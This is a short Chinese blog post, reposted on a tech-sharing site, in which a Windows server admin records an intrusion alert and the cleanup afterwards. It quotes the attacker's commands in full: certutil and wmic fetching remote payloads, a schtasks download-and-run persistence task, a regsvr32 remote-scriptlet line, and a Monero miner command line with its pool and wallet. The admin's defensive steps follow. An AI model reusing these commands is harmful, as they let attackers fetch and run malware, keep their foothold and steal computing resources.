标签：core 一次 http -- Windows exe 应用 入侵 schtasks

服务器报警

命令行: cmd.exe /c "certutil.exe -urlcache -split -f http://146.196.83.217:29324/winTask.exe C:WindowsTempwinTask.exe"
命令行: C:\Windows\System32\Wbem\wmic.EXE os get /format:"http://sec.dashabi.in/javaw2/net/net.xsl"
进程路径: C:/Windows/System32/wbem/WMIC.exe
进程ID: 8544
父进程命令行: taskeng.exe {91BBC158-F18D-4E4A-8D69-117DF5612003} S-1-5-18:NT AUTHORITY\System:Service:
命令行: schtasks /create /tn SystemProcessDebug /tr "certutil.exe -urlcache -split -f http://118.190.211.34:82/image/png/winTask.exe C:\Window\Temp\winTask.exe & C:\Windows\Temp\winTask.exe" /sc daily
进程PID: 10736
进程文件名: schtasks.exe

c:/windows/temp/core/core.exe
命令行参数: C:\Windows\Temp\core\core.exe --coin monero -o xmr.f2pool.com:13531 -u 46YngqQEZQ6HYhqP7noesGdoecXZRM2jR16t7RKTbhW4TtqdKUQyggs3x7pADEWvpr5ySbesyQQwJfaHbewXurEWNdeWNtj.gtest -p x -k -B --donate-level=1 --cpu-max-threads-hint=70

类型: Task Scheduler（计划任务）
路径: \Microsoft\Windows\MUI\LMRemover
内容: regsvr32 /u /s /i:http://sec.dashabi.in/javaw2/instance.xsl scrobj.dll
事件说明: 检测模型发现您服务器上的某些自启动项可疑，可能是恶意软件或者黑客在入侵后进行的持久化痕迹。
这个没看明白 https://www.cnblogs.com/backlion/p/10489521.html

将ip 加入黑名单,将域名加到hosts中指向127.0.0.1
?将schtasks.exe 文件改为非admin可执行 需要trustedinstaller提供的权限
==>
新建管理员用户,登录,对该文件 属性--安全--所有者--编辑换成当前用户 然后再更改权限
?删除定时任务
chcp 437
schtasks /query /fo LIST /v |findstr http

标签：core,一次,http,--,Windows,exe,应用,入侵,schtasks
来源： https://www.cnblogs.com/qtong/p/14856070.html

本站声明： 1. iCode9 技术分享网（下文简称本站）提供的所有内容，仅供技术学习、探讨和分享；
2. 关于本站的所有留言、评论、转载及引用，纯属内容发起人的个人观点，与本站观点和立场无关；
3. 关于本站的所有言论和文字，纯属内容发起人的个人观点，与本站观点和立场无关；
4. 本站文章均是网友提供，不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属；如您发现该文章侵犯了您的权益，可联系我们第一时间进行删除；
5. 本站为非盈利性的个人网站，所有内容不会用来进行牟利，也不会利用任何形式的广告来间接获益，纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。